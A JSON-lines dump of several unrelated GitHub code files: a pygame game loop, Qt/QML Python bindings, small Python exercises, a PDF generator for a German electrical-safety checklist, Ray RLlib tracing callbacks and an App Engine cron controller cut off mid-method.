pygame.Rect(150, 300, 102, 126)\n\n# 游戏循环 -->意味着游戏的正式开始\nwhile True:\n # 设置屏幕刷新帧率\n clock.tick(60)\n\n # 监听事件\n for event in pygame.event.get():\n # 判断用户是否点击了关闭按钮\n if event.type == pygame.QUIT:\n print(\"退出游戏....\")\n # 卸载所有已经加载的pygame模块\n pygame.quit()\n # 这里不能用break,break只能跳出当前的for循环,又返回到外部的while循环中\n # break\n # 这里用exit(),可以直接终止整个程序\n exit()\n # 修改英雄位置\n hero_rect.y -= 1\n if hero_rect.bottom <= 0:\n hero_rect.y = screen.get_height()\n\n # 重新绘制所有图像\n # 如果不再次绘制背景,会产生飞机的残影效果\n # 因为这是同一个屏幕对象,screen最后产生的效果是所有图像的叠加\n # 再次绘制背景就是要把以前的图像全部遮盖住\n screen.blit(bg, (0, 0))\n # blit方法的第二个参数既可以是一个矩形,也可以是一个坐标元组\n screen.blit(hero, hero_rect)\n # screen.blit(hero, (hero_rect.x, hero_rect.y))\n # 更新屏幕\n pygame.display.update()\n","repo_name":"kenzzuli/hm_15","sub_path":"01-04_python基础/飞机大战/hm_11_监听事件列表.py","file_name":"hm_11_监听事件列表.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28904129536","text":"from __future__ import unicode_literals\nfrom functools import partial\n\nfrom PyQuick.DOtherSide import ffi, lib\nfrom PyQuick.QtCore import QUrl, QObject\nfrom PyQuick.utils import encode_first_arg, str2ptr\n\n\ndef create_callback(id, wrapper, bindedQObject, dosQObject, type_):\n obj = type_()\n bindedQObject[0] = obj._handle\n dosQObject[0] = obj._vptr\n\n\n@ffi.callback('DeleteDObject')\ndef delete_callback(id, bindedQObject):\n lib.dos_qobject_delete(bindedQObject[0])\n\n\ndef qmlRegisterType(type_, mod_name, major, minor, type_name):\n \"\"\"\n qmlRegisterType(type, str, int, int, str, attachedProperties: type = 0) -> int\n \"\"\"\n new_callback = ffi.callback('CreateDObject')(partial(create_callback, type_=type_))\n return lib.dos_qdeclarative_qmlregistertype(\n ffi.new(\n 'const QmlRegisterType *',\n {\n 'major': major,\n 'minor': minor,\n 'uri': str2ptr(mod_name),\n 'qml': str2ptr(type_name),\n 'staticMetaObject': type_.metaObject()._vptr,\n 'createDObject': new_callback,\n 'deleteDObject': delete_callback\n }\n )\n )\n\n\ndef qmlRegisterSingletonType(type_, mod_name, major, minor, type_name):\n \"\"\"\n qmlRegisterSingletonType(type, str, int, int, str) -> int\n \"\"\"\n return 
lib.dos_qdeclarative_qmlregistersingletontype(\n ffi.new(\n 'const QmlRegisterType *',\n {\n 'major': major,\n 'minor': minor,\n 'uri': str2ptr(mod_name),\n 'qml': str2ptr(type_name),\n 'staticMetaObject': type_.metaObject()._vptr,\n 'createDObject': create_callback,\n 'deleteDObject': delete_callback\n }\n )\n )\n\n\nclass QQmlContext(object):\n def __init__(self, vptr):\n self._vptr = vptr\n\n @encode_first_arg\n def setContextProperty(self, name, value):\n lib.dos_qqmlcontext_setcontextproperty(self._vptr, name, value._vptr)\n \n def baseUrl(self):\n return QUrl(lib.dos_qqmlcontext_baseUrl(self._vptr))\n\n \nclass QQmlApplicationEngine(object):\n def __init__(self, *args, **kwargs):\n vptr = lib.dos_qqmlapplicationengine_create()\n self._vptr = ffi.gc(vptr, lib.dos_qqmlapplicationengine_delete)\n if len(args):\n url = args[0]\n self.load(url)\n\n def load(self, url):\n if not isinstance(url, QUrl):\n # lib.dos_qqmlapplicationengine_load(self._vptr, url)\n url = QUrl(url)\n lib.dos_qqmlapplicationengine_load_url(self._vptr, url._vptr)\n\n @encode_first_arg\n def loadData(self, data):\n lib.dos_qqmlapplicationengine_load_data(self._vptr, data)\n\n @encode_first_arg\n def addImportPath(self, path):\n lib.dos_qqmlapplicationengine_add_import_path(self._vptr, path)\n\n def rootContext(self):\n return QQmlContext(lib.dos_qqmlapplicationengine_context(self._vptr))\n \n def rootObjects(self):\n raise NotImplementedError\n \n @encode_first_arg\n def addImageProvider(self, name, provider):\n lib.dos_qqmlapplicationengine_addImageProvider(self._vptr, name, provider._vptr)\n","repo_name":"SoulMelody/PyQuick","sub_path":"PyQuick/QtQml.py","file_name":"QtQml.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75242074114","text":"import Src.Classification as classify\nimport Src.DataFormatter as dfm\nimport numpy as np\n\nexpression_file = \"Data/CCLE_Data/sample1000.csv\"\nic50_file = 'Data/IC_50_Data/CL_Sensitivity_Multiple_Drugs.csv'\npatient_directory = \"Data/TCGA_Data/9f2c84a7-c887-4cb5-b6e5-d38b00d678b1/Expression-Genes/UNC__AgilentG4502A_07_3/Level_3\"\n\ndef test_neat_accuracy():\n model = classify.Scikit_Model(\"neat\")\n accuracy = model.get_model_accuracy_filter_feature_size(expression_file,ic50_file,5,1,\"SMAP\")\n acc = [a for a in accuracy]\n print(acc)\n","repo_name":"joewledger/Cell-Line-Classification","sub_path":"Tests/Test_Classification.py","file_name":"Test_Classification.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36865905456","text":"from homework_13.task_02.last_works import Rectangle\nfrom homework_13.task_02.custom_exceptions import (RectangleTypeError, RectangleValueError)\n\n\nclass RectangleWorks:\n @classmethod\n def rectangle_create(cls, length: [int, float], width: [int, float]) -> Rectangle:\n if not isinstance(length, (int, float)):\n raise RectangleValueError(value=length)\n if not isinstance(width, (int, float)):\n raise RectangleValueError(value=width)\n if width <= 0 or length <= 0:\n raise RectangleValueError\n return Rectangle(length, width)\n\n @classmethod\n def rectangle_sum(cls, left: Rectangle, right: Rectangle) -> Rectangle:\n if not isinstance(left, Rectangle):\n raise RectangleTypeError(left)\n if not isinstance(right, Rectangle):\n raise RectangleTypeError(right)\n return left + right\n\n @classmethod\n def rectangle_sub(cls, left: 
Rectangle, right: Rectangle) -> Rectangle:\n if not isinstance(left, Rectangle):\n raise RectangleTypeError(left)\n if not isinstance(right, Rectangle):\n raise RectangleTypeError(right)\n return left - right\n","repo_name":"BeliaevAndrey/Python-II-Homeworks","sub_path":"homework_13/task_02/homework13_classes/RectangleWorksClass.py","file_name":"RectangleWorksClass.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6100743987","text":"class MyIterator:\r\n def __iter__(self):\r\n self.n = 0\r\n return self\r\n\r\n def __next__(self):\r\n self.n += 1\r\n if self.n<=10:\r\n return self.n\r\n else:\r\n raise StopIteration\r\n\r\nit = iter(MyIterator())\r\nprint(list(it))\r\nprint(tuple(it))\r\nprint(set(it))\r\nprint(frozenset(it))\r\nprint(dict(enumerate(it)))","repo_name":"psounis/python_advanced","sub_path":"advanced/advanced02.iterators/iterator.conversions.py","file_name":"iterator.conversions.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"39653512102","text":"from fpdf import FPDF\nfrom pathlib import Path\n\ndef create_pdf(input):\n\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n\n base_path = Path(__file__).parent\n\n dguvnormalpath = (base_path / \"resources/fonts/DGUVMeta-Normal.ttf\").resolve()\n dguvboldpath = (base_path / \"resources/fonts/DGUVMeta-Bold.ttf\").resolve()\n dguvnormalitalicpath = (base_path / \"resources/fonts/DGUVMeta-NormalItalic.ttf\").resolve()\n\n pdf.add_font('DGUVMeta-Normal', '', dguvnormalpath, uni=True)\n pdf.add_font('DGUVMeta-Bold', '', dguvboldpath, uni=True)\n pdf.add_font('DGUVMeta-NormalItalic', '', dguvnormalitalicpath, uni=True)\n\n template1page1path = (base_path / \"resources/images/newtemplate1_seite1.jpg\").resolve()\n pdf.image(str(template1page1path), x=-4, y=-8, w=217, h=313)\n\n data = {}\n docid = input.get(\"docid\")\n input = input.get(\"data\")\n\n #Kopffragen\n\n data[\"arbeitsstelle\"] = input.get('#/properties/arbeitsstelle-arbeitsort')\n jsontime = input.get('#/properties/datum-und-uhrzeit')\n try:\n if 'null' in jsontime:\n datetime = '%s.%s.%s' % (jsontime[8:10], jsontime[5:7], jsontime[:4])\n else:\n datetime = '%s.%s.%s %s' % (jsontime[8:10], jsontime[5:7], jsontime[:4], jsontime[11:])\n except:\n datetime = jsontime\n data[\"datum_uhrzeit\"] = datetime\n data[\"person_anlageverantwortlichkeit\"] = input.get('#/properties/person-in-der-rolle-des-anlagenverantwortlichen')\n data[\"person_arbeitsverantwortlichkeit\"] = input.get('#/properties/person-in-der-rolle-des-arbeitsverantwortlichen')\n data[\"person_arbeitsausfuehrung\"] = input.get('#/properties/arbeitsausfuhrende-person')\n\n data[\"zusaetzliche_schutzausrüstung_elektrischerschlag\"] = \"\"\n data[\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"] = \"\"\n if input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n if 'gegen elektrischen Schlag' in input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n data[\"zusaetzliche_schutzausrüstung_elektrischerschlag\"] = \"x\"\n\n if 'gegen Störlichtbogen' in input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n data[\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"] = \"x\"\n\n if input.get('#/properties/stehen-andere-anlagenteile-weiterhin-unter') == \"ja\":\n data[\"abgrenzung_arbeitsbereich_ja\"] = \"x\"\n else:\n 
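A note on the MyIterator example above: because __iter__ resets self.n to 0 every time it is called, each builtin conversion (list, tuple, set, frozenset, dict(enumerate(...))) restarts the count at 1 instead of finding an exhausted iterator, since every constructor calls iter() on its argument again. A contrast sketch with a class of my own that skips the reset:

class OneShot:
    def __init__(self):
        self.n = 0

    def __iter__(self):
        # no reset here, so the instance supports a single pass only
        return self

    def __next__(self):
        self.n += 1
        if self.n <= 10:
            return self.n
        raise StopIteration

it = OneShot()
print(list(it))   # [1, 2, ..., 10]
print(tuple(it))  # () because the single pass is already spent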
data[\"abgrenzung_arbeitsbereich_ja\"] = \"\"\n\n if input.get('#/properties/stehen-andere-anlagenteile-weiterhin-unter') == \"nein\":\n data[\"abgrenzung_arbeitsbereich_nein\"] = \"x\"\n else:\n data[\"abgrenzung_arbeitsbereich_nein\"] = \"\"\n\n # 1\n\n data[\"art_der_freischaltung\"] = input.get('#/properties/edi4961450e44ba4d16aeb015a919e73f0a')\n\n if data[\"art_der_freischaltung\"] == \"NH-Sicherungen\":\n data[\"ausloesestrom\"] = input.get('#/properties/edibe2aabe1258d47b585d178a186601fc3')\n elif data[\"art_der_freischaltung\"] == \"NH-Lastschaltleiste\":\n data[\"ausloesestrom\"] = input.get('#/properties/edib93efcc9a763409c9d3e8357a8774554')\n elif data[\"art_der_freischaltung\"] == \"Schraubsicherungen\":\n data[\"ausloesestrom\"] = input.get('#/properties/edic980387b0bd741e2ac4a15e7e4b6cc2e')\n else:\n data[\"ausloesestrom\"] = \"\"\n\n data[\"ort_der_freischaltung\"] = input.get('#/properties/edi2e32c9143f91464392d3ea5b72c1db89')\n\n if data[\"ort_der_freischaltung\"] == \"Hauptverteilung\":\n data[\"ort_nroderbezeichnung\"] = input.get('#/properties/edi32c21570304b4f0d911d02b8a8046d0c')\n elif data[\"ort_der_freischaltung\"] == \"Unterverteilung\":\n data[\"ort_nroderbezeichnung\"] = input.get('#/properties/edi6ba4422c3dad4ea2a5ed921a02764123')\n else:\n data[\"ort_nroderbezeichnung\"] = \"\"\n\n # 2\n\n data[\"sperrelement\"] = input.get('#/properties/edi36e713d0f0544afab38414b8d139fcec')\n data[\"betriebsraum_tuer_verschlossen\"] = input.get('#/properties/edi8aeb082703364653b77ecedfb294800c')\n data[\"schalten_verboten\"] = input.get('#/properties/ediff3de7cc99c74d7a8d7fc9430714cc4d')\n data[\"entzogene_nhsicherungen\"] = input.get('#/properties/edi50f4e39a4ebd44a083133f828058814a')\n\n # 3\n\n data[\"spannungspruefer\"] = input.get('#/properties/edi9b0ea2910d514df791e528597a6e5f28')\n data[\"usv\"] = input.get('#/properties/edi94283112763649bda0ef6f900ddc2cbc')\n\n # 4\n\n data[\"euk_wo_eingebaut\"] = input.get('#/properties/edibba761f4767d4a3b9f1528712f8f1abe')\n if data[\"euk_wo_eingebaut\"] == \"Nicht geerdet und kurzgeschlossen\":\n data[\"geerdet_begruendung\"] = input.get('#/properties/edi1941312f7bf04fa5996ec5eb018f4c78')\n else:\n data[\"geerdet_begruendung\"] = \"\"\n\n # 5\n\n data[\"ziel_der_abdeckung\"] = input.get('#/properties/edi94f9841893d04f6184e06a9b57797e59')\n\n if data[\"ziel_der_abdeckung\"] == \"ausreichender Berührungsschutz\":\n data[\"art_der_abdeckung\"] = ', '.join(input.get('#/properties/edib6c44b7e15b043ec9dff1538ffc40229'))\n elif data[\"ziel_der_abdeckung\"] == \"vollständiger Berührungsschutz\":\n data[\"art_der_abdeckung\"] = ', '.join(input.get('#/properties/edifc9c22900aa44e15b334d724a0c3eed6'))\n elif data[\"ziel_der_abdeckung\"] == \"Abdeckung nicht notwendig\":\n entfernung_text = input.get('#/properties/edi66bace84743b4078b2aa9941828b96d6')\n entfernung_meter = input.get('#/properties/edicd089579321d4eac9ab5a08f7f2f5f07')\n data[\"art_der_abdeckung\"] = \"%s %s m\" % (entfernung_text, entfernung_meter)\n else:\n data[\"art_der_abdeckung\"] = \"\"\n\n # Title\n\n pdf.set_font('DGUVMeta-Bold', '', 20)\n pdf.set_text_color(0,73,148)\n pdf.set_xy(12.7, 58.5)\n pdf.cell(0, 0, 'Arbeiten an Unterverteilungen')\n\n pdf.set_font('DGUVMeta-Bold', '', 20)\n pdf.set_text_color(0,73,148)\n pdf.set_xy(12.7, 68)\n pdf.cell(0, 0, 'in der Niederspannung')\n\n pdf.set_font('DGUVMeta-Bold', '', 14)\n pdf.set_text_color(0,140,142)\n pdf.set_xy(12.7, 83.5)\n pdf.cell(0, 0, 'Elektrohandwerk')\n\n # Kopffragen\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n 
pdf.set_xy(13, 107)\n pdf.set_text_color(0,0,0)\n pdf.cell(0, 0, data.get(\"arbeitsstelle\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 126)\n pdf.cell(0, 0, data.get(\"datum_uhrzeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 145)\n pdf.cell(0, 0, data.get(\"person_anlageverantwortlichkeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 164)\n pdf.cell(0, 0, data.get(\"person_arbeitsverantwortlichkeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 183)\n pdf.cell(0, 0, data.get(\"person_arbeitsausfuehrung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(20, 208.5)\n pdf.cell(0, 0, \"gegen elektrischen Schlag\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(14.3, 208.3)\n pdf.cell(0, 0, data.get(\"zusaetzliche_schutzausrüstung_elektrischerschlag\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(78, 208.5)\n pdf.cell(0, 0, \"gegen Störlichbogen\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(72.2, 208.3)\n pdf.cell(0, 0, data.get(\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(20, 232)\n pdf.cell(0, 0, \"ja\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(14.4, 231.6)\n pdf.cell(0, 0, data.get(\"abgrenzung_arbeitsbereich_ja\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(78, 232)\n pdf.cell(0, 0, \"nein\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(72.2, 231.6)\n pdf.cell(0, 0, data.get(\"abgrenzung_arbeitsbereich_nein\"))\n\n #Adding new page\n\n pdf.add_page()\n template1page2path = (base_path / \"resources/images/newtemplate1_seite2.jpg\").resolve()\n pdf.image(str(template1page2path), x=-4, y=-8, w=217, h=313)\n\n # 1 Freigeschaltet\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 29.2)\n pdf.cell(0, 0, 'Wie erfolgte die Freischaltung?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 34.2)\n pdf.cell(0, 0, data.get(\"art_der_freischaltung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 39.2)\n pdf.cell(0, 0, 'Auslösestrom: %s A' % data.get(\"ausloesestrom\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 50)\n pdf.cell(0, 0, 'Wo erfolgte die Freischaltung?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 55)\n pdf.cell(0, 0, data.get(\"ort_der_freischaltung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 60)\n pdf.cell(0, 0, 'Nr. 
oder Bezeichnung: %s' % data.get(\"ort_nroderbezeichnung\"))\n\n # 2 Gegen Wiedereinschalten gesichert\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 77.5)\n pdf.cell(0, 0, 'Wurde ein Sperrelement eingesetzt, weil der Bereich für Laien zugänglich ist?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 82.5)\n pdf.cell(0, 0, data.get(\"sperrelement\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 89)\n pdf.cell(0, 0, 'Wurde die Tür zum elektrischen Betriebsraum verschlossen?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 94)\n pdf.cell(0, 0, data.get(\"betriebsraum_tuer_verschlossen\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 100.5)\n pdf.cell(0, 0, 'Wurde ein Schild \"Schalten verboten\" zusätzlich angebracht?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 105.5)\n pdf.cell(0, 0, data.get(\"schalten_verboten\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 112)\n pdf.cell(0, 0, 'Wurden ausgebaute NH-Sicherungen unbefugtem Zugriff entzogen, z. B. mitgenommen?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 117)\n pdf.cell(0, 0, data.get(\"entzogene_nhsicherungen\"))\n\n # 3 Spannungsfreiheit allpolig festgestellt an der Arbeitsstelle\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 136)\n pdf.cell(0, 0, 'Zweipoliger Spannungsprüfer:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 141)\n pdf.cell(0, 0, data.get(\"spannungspruefer\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 147.5)\n pdf.cell(0, 0, 'Dezentrale Einspeisung vorhanden, z. B. 
USV, PV, Notstromaggregat?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 152.5)\n pdf.cell(0, 0, data.get(\"usv\"))\n\n # 4 Geerdet und kurzgeschlossen\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 189)\n pdf.cell(0, 0, 'Wo wurde die EuK-Vorrichtung eingebaut?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 194)\n pdf.cell(0, 0, data.get(\"euk_wo_eingebaut\"))\n\n if data[\"euk_wo_eingebaut\"] == \"Nicht geerdet und kurzgeschlossen\":\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 200.5)\n pdf.cell(0, 0, 'Begründung:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 205.5)\n pdf.cell(0, 0, data.get(\"geerdet_begruendung\"))\n\n # 5 Mit der Abdeckung soll erreicht werden\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 236.6)\n pdf.cell(0, 0, 'Mit der Abdeckung soll erreicht werden:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 241.6)\n pdf.cell(0, 0, data.get(\"ziel_der_abdeckung\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 248.1)\n if data[\"ziel_der_abdeckung\"] != \"Abdeckung nicht notwendig\":\n pdf.cell(0, 0, 'Art der Abdeckung:')\n else:\n pdf.cell(0, 0, 'keine Abdeckung angebracht, weil:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 253.1)\n pdf.cell(0, 0, data.get(\"art_der_abdeckung\"))\n\n return pdf.output('/tmp/%s.pdf' % docid, 'F')\n\nif __name__ == \"__main__\":\n from importdata import unterverteilung as input\n create_pdf(input)\n","repo_name":"educorvi/ella.printfiverules","sub_path":"src/printfiverules/s144.py","file_name":"s144.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29418761505","text":"from typing import Dict, Optional, TypeVar\n\nimport numpy as np\nfrom opentelemetry import trace\nfrom opentelemetry.exporter.jaeger.thrift import JaegerExporter\nfrom opentelemetry.sdk.resources import SERVICE_NAME, Resource\nfrom opentelemetry.sdk.trace import Span, TracerProvider\nfrom opentelemetry.sdk.trace.export import BatchSpanProcessor\nfrom ray.rllib import SampleBatch\nfrom ray.rllib.algorithms.callbacks import DefaultCallbacks\nfrom ray.rllib.env import BaseEnv\nfrom ray.rllib.evaluation import MultiAgentEpisode, RolloutWorker\nfrom ray.rllib.policy import Policy\nfrom ray.rllib.utils.typing import PolicyID\n\nfrom ray_runner.bigtwo_multi_agent import BigTwoMultiAgentEnv\n\n\ndef setup_tracing() -> None:\n resource = Resource(attributes={SERVICE_NAME: \"rayrunner\"})\n\n jaeger_exporter = JaegerExporter(\n agent_host_name=\"localhost\",\n agent_port=6831,\n udp_split_oversized_batches=True,\n )\n\n processor = BatchSpanProcessor(jaeger_exporter)\n provider = TracerProvider(resource=resource)\n\n provider.add_span_processor(processor)\n trace.set_tracer_provider(provider)\n\n\nclass CustomMetricCallback(DefaultCallbacks):\n def on_episode_end(\n self,\n *,\n worker: RolloutWorker,\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n hands_played, actions_attempted = [], []\n card_length_played = {}\n for unwrapped_env in base_env.get_unwrapped():\n if not 
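The datetime handling near the top of create_pdf above slices the ISO string by hand inside a broad try/except. A hedged alternative sketch using only the standard library; the function name is mine, and it assumes the form really sends ISO-8601 values:

from datetime import datetime

def format_ts(jsontime):
    # '2021-03-05T14:30' becomes '05.03.2021 14:30'; a date-only value keeps just the date
    try:
        dt = datetime.fromisoformat(jsontime)
    except (TypeError, ValueError):
        return jsontime  # fall back to the raw value, as the original does
    fmt = '%d.%m.%Y' if (dt.hour, dt.minute) == (0, 0) else '%d.%m.%Y %H:%M'
    return dt.strftime(fmt)

print(format_ts('2021-03-05T14:30'))  # 05.03.2021 14:30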
isinstance(unwrapped_env, BigTwoMultiAgentEnv):\n continue\n\n hands_played.append(unwrapped_env.hands_played())\n actions_attempted.append(unwrapped_env.actions_attempted())\n\n for player_idx, action in unwrapped_env.base_env.past_actions:\n card_length_played[len(action)] = (\n card_length_played.get(len(action), 0) + 1\n )\n\n episode.custom_metrics[\"hands_played\"] = np.mean(hands_played)\n episode.custom_metrics[\"actions_attempted\"] = np.mean(actions_attempted)\n\n for hand_length, counter in card_length_played.items():\n episode.custom_metrics[f\"hand_length_{hand_length}\"] = counter\n\n\nclass TracingCallback(DefaultCallbacks):\n def __init__(self):\n super().__init__()\n self.episode_start_span: Optional[Span] = None\n\n def on_episode_start(\n self,\n *,\n worker: \"RolloutWorker\",\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n tracer = trace.get_tracer(__name__)\n self.episode_start_span = tracer.start_span(\"on_episode_start\")\n\n def on_episode_end(\n self,\n *,\n worker: \"RolloutWorker\",\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n if self.episode_start_span:\n self.episode_start_span.end()\n\n def on_sample_end(\n self, *, worker: \"RolloutWorker\", samples: SampleBatch, **kwargs\n ) -> None:\n if self.episode_start_span and self.episode_start_span.end_time is None:\n self.episode_start_span.end()\n\n def on_learn_on_batch(\n self, *, policy: Policy, train_batch: SampleBatch, result: dict, **kwargs\n ) -> None:\n # print(\"learn_on_batch:\", train_batch.count, datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"))\n pass\n","repo_name":"Wal8800/card-games","sub_path":"ray_runner/ray_custom_util.py","file_name":"ray_custom_util.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5627686029","text":"# coding=UTF-8\n# -*- coding: UTF-8 -*-\nimport datetime\nimport logging\nimport math\nimport urllib2\n\nfrom google.appengine.api import taskqueue, mail\n\nfrom common.lib.CategoryLib import CategoryLib\nfrom common.lib.Controller import Controller\nfrom common.lib.MturkLib import MturkLib\nfrom common.lib.RSSLib import RSSLib\nfrom common.models.CategoryModel import CategoryModel\nfrom module.article.lib.ArticleLib import ArticleLib\nfrom module.article.model.ArticleModel import ArticleModel\nfrom module.associatedpress.lib.AssociatedPressLib import AssociatedPressLib\nfrom module.category.CategoryController import CategoryController\nfrom module.comments.lib.CommentsLib import CommentsLib\nfrom module.comments.model.Comments import Comments\nfrom module.home.view.NullView import NullView\nfrom module.mturk.MturkController import MturkController\nfrom module.natlang.model.SentenceModel import SentenceModel\nfrom module.usatoday.lib.UsaTodayLib import UsaTodayLib\nfrom module.wiki.lib.WikiLib import WikiLib\nfrom module.wiki.model.WikiCategoryModel import WikiCategoryModel\nfrom module.wiki.model.WikiModel import WikiModel\nfrom webapp2_extras.appengine.auth.models import User\n\nclass CronController(Controller):\n \n def generate_reportAction(self):\n model={'num_comments':0,'num_articles':0,'num_users':0}\n # number of new comments in the last 24 hours\n model['num_comments']=Comments.all().filter(\"created >\",(datetime.datetime.now()-datetime.timedelta(days=1))).count()\n 
# number of new articles in the last 24 hours\n model['num_articles']=ArticleModel.all().filter(\"updated >\",(datetime.datetime.now()-datetime.timedelta(days=1))).count()\n # number of new users in the last 24 hours\n \n qry = User.query(User.created > datetime.datetime.now()-datetime.timedelta(days=1))\n model['num_users']=qry.count()\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'Daily Activity Report',str(model)) \n \n return model\n \n \n def set_category_levelAction(self):\n model={\"total\":0}\n \n category=CategoryModel.all().filter(\"level =\",None).filter(\"wikiname !=\",None).get()\n \n if category:\n CategoryController().set_category_levelAction(category.wikiname)\n \n return model\n \n def sort_articlesAction(self):\n model={\"num_articles\":0}\n model['num_articles']=ArticleLib.sort_articles()\n return model\n \n def reload_article_memcacheAction(self):\n model={\"num_articles\":0}\n model['num_articles']=ArticleLib.reload_memcache()\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', '/cron/reload_article_memcache','loaded '+str(model['num_articles'])+\" articles\")\n return model\n \n def flush_article_memcache_to_dbAction(self):\n model={\"total\":0}\n model['total']=ArticleLib.flush_memcache_to_db()\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', '/cron/flush_article_memcache_to_db','flushed '+str(model['total'])+\" records\") \n return model\n \n def delete_category_search_indexAction(self,page=1,limit=100,rebuild=True):\n model={\"total\":0}\n \n model['total']=CategoryLib.deleteSearchIndex(limit)\n if model['total']>0:\n taskqueue.add(url=\"/json/cron/delete_category_search_index\")\n elif rebuild:\n taskqueue.add(url=\"/json/cron/build_category_search_index\")\n return model\n \n def 